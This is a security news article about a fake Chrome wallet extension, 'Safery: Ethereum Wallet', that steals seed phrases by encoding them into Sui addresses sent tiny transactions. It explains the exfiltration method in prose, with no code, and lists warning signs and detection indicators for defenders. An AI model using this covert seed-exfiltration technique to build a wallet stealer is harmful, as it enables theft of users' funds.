🚨 Alert: Malicious Ethereum Wallet Extension Hijacks Seed Phrases via Blockchain Transactions

Crypto users beware—a wolf in sheep's clothing just entered the DeFi pasture. A fake Ethereum wallet extension has been siphoning seed phrases by exploiting blockchain transactions, turning self-custody into self-sabotage.

How It Works: The malware masquerades as a legitimate wallet tool, then intercepts recovery phrases during routine transactions. No fancy hack—just old-school deception with a Web3 twist.

Why It Matters: While Wall Street spends millions on 'blockchain security consultants,' this $0-cost phishing attack proves crypto's weakest link remains the same: humans trusting shiny interfaces.

Bottom Line: Always verify extensions like you'd verify a 'financial advisor' with yacht photos but no LinkedIn. Your keys, your coins—your responsibility.

TLDR

• A malicious Chrome extension called “Safery: Ethereum Wallet” ranks fourth in Chrome Web Store searches for Ethereum wallets
• The extension steals seed phrases by encoding them into fake Sui blockchain addresses and sending tiny transactions worth 0.000001 SUI
• Threat actors decode the recipient addresses from these microtransactions to reconstruct users’ seed phrases and drain their wallets
• The extension was uploaded to Chrome Web Store on September 29, 2025 and remained available as of November 13, 2025
• Warning signs include zero user reviews, grammatical errors in branding, no official website, and a Gmail-linked developer account

A fake cryptocurrency wallet extension on Google’s Chrome Web Store is stealing user seed phrases through an unusual method involving blockchain microtransactions. The extension has appeared high in search results despite containing malicious code.

🚨 SECURITY ALERT: Malicious Chrome Extension Stealing crypto Assets

A fake ethereum wallet extension "Safery: Ethereum Wallet" is exfiltrating seed phrases by encoding them into #Sui transactions—a highly sophisticated attack method.

⚠️ Extension Name: Safery: Ethereum Wallet… pic.twitter.com/FIEkkq2pau

— GoPlus Security 🚦 (@GoPlusSecurity) November 14, 2025

The extension is named “Safery: Ethereum Wallet.” It markets itself as a secure tool for managing Ethereum-based assets. Blockchain security platform Socket identified the threat in a report published on Tuesday.

The malicious software currently ranks as the fourth search result when users type “Ethereum Wallet” into the Chrome Web Store. It appears just below legitimate wallet extensions like MetaMask, Wombat, and Enkrypt. The extension was first uploaded on September 29, 2025.

The extension works by allowing users to either create new wallets or import existing ones. Both options compromise user security. When a user creates a new wallet, the extension immediately captures the seed phrase.

How the Theft Mechanism Works

The malware uses a unique method to steal credentials without traditional command-and-control servers. It encodes BIP-39 mnemonic seed phrases into synthetic Sui-style blockchain addresses. The extension then sends a microtransaction of 0.000001 sui to these fake addresses from a wallet controlled by the attackers.

Security researcher Kirill Boychenko from Socket explained the process. The seed phrase leaves the user’s browser hidden inside normal-looking blockchain transactions. Threat actors monitor the SUI blockchain for these tiny transactions.

They can then decode the recipient addresses to reconstruct the original seed phrase. Once they have the seed phrase, they gain complete access to drain all assets from the compromised wallet. The method works whether users create new wallets or import existing ones.

Users who import existing wallets face immediate risk. The moment they enter their seed phrase into the extension, it gets transmitted through the blockchain transaction system. The attackers can access these funds at any time after capturing the credentials.

Warning Signs and Detection

Several red flags indicate the extension’s lack of legitimacy. The extension has zero user reviews on the Chrome Web Store. Its branding contains grammatical mistakes and appears limited in quality.

There is no official website linked to the extension. The developer contact information uses a Gmail account rather than a professional domain. These warning signs should alert users before installing the extension.

Koi Security confirmed the threat in an independent analysis. They verified that the extension monitors the blockchain to decode addresses back to seed phrases. Security experts recommend users only install trusted wallet extensions with verified legitimacy.

Defenders should scan extensions for specific malicious indicators. These include mnemonic encoders, synthetic address generators, and hard-coded seed phrases. Extensions that write to the blockchain during wallet import or creation should be blocked.

Boychenko noted that this technique allows threat actors to switch chains and RPC endpoints easily. Traditional detection methods that rely on domains, URLs, or specific extension IDs will miss this type of attack. Unexpected blockchain RPC calls from browsers should be treated as high-priority security signals.

Users should monitor all wallet transactions consistently. Even transactions involving very small amounts could indicate malicious activity. The extension remained available for download on the Chrome Web Store as of November 13, 2025, with its most recent update occurring on November 12.